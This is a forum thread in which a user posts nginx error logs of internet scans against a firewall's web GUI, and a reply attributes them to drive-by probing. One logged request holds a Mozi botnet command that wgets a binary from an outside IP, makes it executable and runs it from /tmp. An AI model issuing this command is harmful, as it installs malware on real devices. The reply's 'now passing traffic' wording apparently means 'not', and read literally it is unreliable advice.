Nginx Errors

canernecocaner

First of all, sorry for my bad english

All seems to be running well, however in the System / General log, I get a number of errors everyday.
In my research at forum, I found out that it was caused by Avast. But in these logs diffrent from them , client address is public ip, no lan ip.

Aug 10 20:12:00 sshguard 26695 Exiting on signal.
Aug 10 20:12:00 sshguard 63968 Now monitoring attacks.
Aug 10 20:49:39 nginx 2023/08/10 20:49:39 [error] 91332#100266: *1443 open() "/usr/local/www/actuator/gateway/routes" failed (2: No such file or directory), client: 83.97.73.87, server: , request: "GET /actuator/gateway/routes HTTP/1.1", host: "95.3.18.34:80"
Aug 10 22:38:32 nginx 2023/08/10 22:38:32 [error] 91332#100266: *1449 open() "/usr/local/www/0bef" failed (2: No such file or directory), client: 172.104.242.173, server: , request: "GET /0bef HTTP/1.0"
Aug 10 22:55:00 sshguard 63968 Exiting on signal.
Aug 10 22:55:00 sshguard 25 Now monitoring attacks.
Aug 10 23:31:34 nginx 2023/08/10 23:31:34 [error] 91148#100306: *1452 open() "/usr/local/www/axis2/services" failed (2: No such file or directory), client: 185.67.34.69, server: , request: "GET /axis2/services HTTP/1.1", host: "95.3.18.34"
Aug 10 23:42:39 nginx 2023/08/10 23:42:39 [error] 91332#100266: *1455 open() "/usr/local/www/.env" failed (2: No such file or directory), client: 148.163.89.130, server: , request: "GET /.env HTTP/1.1", host: "95.3.18.34"
Aug 11 00:23:31 nginx 2023/08/11 00:23:31 [error] 91332#100266: *1462 open() "/usr/local/www/axis2/services/listServices" failed (2: No such file or directory), client: 185.67.34.69, server: , request: "GET /axis2/services/listServices HTTP/1.1", host: "95.3.18.34"
Aug 11 01:25:00 sshguard 25 Exiting on signal.
Aug 11 01:25:00 sshguard 56316 Now monitoring attacks.
Aug 11 01:59:49 nginx 2023/08/11 01:59:49 [error] 91332#100266: *1471 "/usr/local/www/HNAP1/index.php" is not found (2: No such file or directory), client: 178.158.0.111, server: , request: "GET /HNAP1/ HTTP/1.1", host: "95.3.18.34", referrer: "http://95.3.18.34/"
Aug 11 03:52:00 sshguard 56316 Exiting on signal.
Aug 11 03:52:00 sshguard 22800 Now monitoring attacks.
Aug 11 04:01:23 nginx 2023/08/11 04:01:23 [error] 91332#100266: 1479 open() "/usr/local/www/shell" failed (2: No such file or directory), client: 175.107.13.232, server: , request: "GET /shell?cd+/tmp;rm+-rf+;wget+http://175.107.13.232:36560/Mozi.a;chmod+777+Mozi.a;/tmp/Mozi.a+jaws HTTP/1.1", host: "95.3.18.34:80"
Aug 11 04:42:17 nginx 2023/08/11 04:42:17 [error] 91332#100266: *1484 open() "/usr/local/www/boaform/admin/formLogin" failed (2: No such file or directory), client: 5.42.84.104, server: , request: "POST /boaform/admin/formLogin HTTP/1.1", host: "95.3.18.34:80", referrer: "http://95.3.18.34:80/admin/login.asp"
Aug 11 05:22:22 nginx 2023/08/11 05:22:22 [error] 91332#100266: *1487 open() "/usr/local/www/hudson" failed (2: No such file or directory), client: 192.241.232.36, server: , request: "GET /hudson HTTP/1.1", host: "95.3.18.34"
Aug 11 05:23:51 nginx 2023/08/11 05:23:51 [error] 91332#100266: *1488 open() "/usr/local/www/.git/config" failed (2: No such file or directory), client: 138.68.132.3, server: , request: "GET /.git/config HTTP/1.1", host: "95.3.18.34"
Aug 11 06:26:00 sshguard 22800 Exiting on signal.
Aug 11 06:26:00 sshguard 37016 Now monitoring attacks.

thanks in advance...

stephenw10

Looks like your webgui is open to the internet and those are drive-by connection attempts.

Make sure your WAN firewall rules are now passing traffic to the webgui.

Steve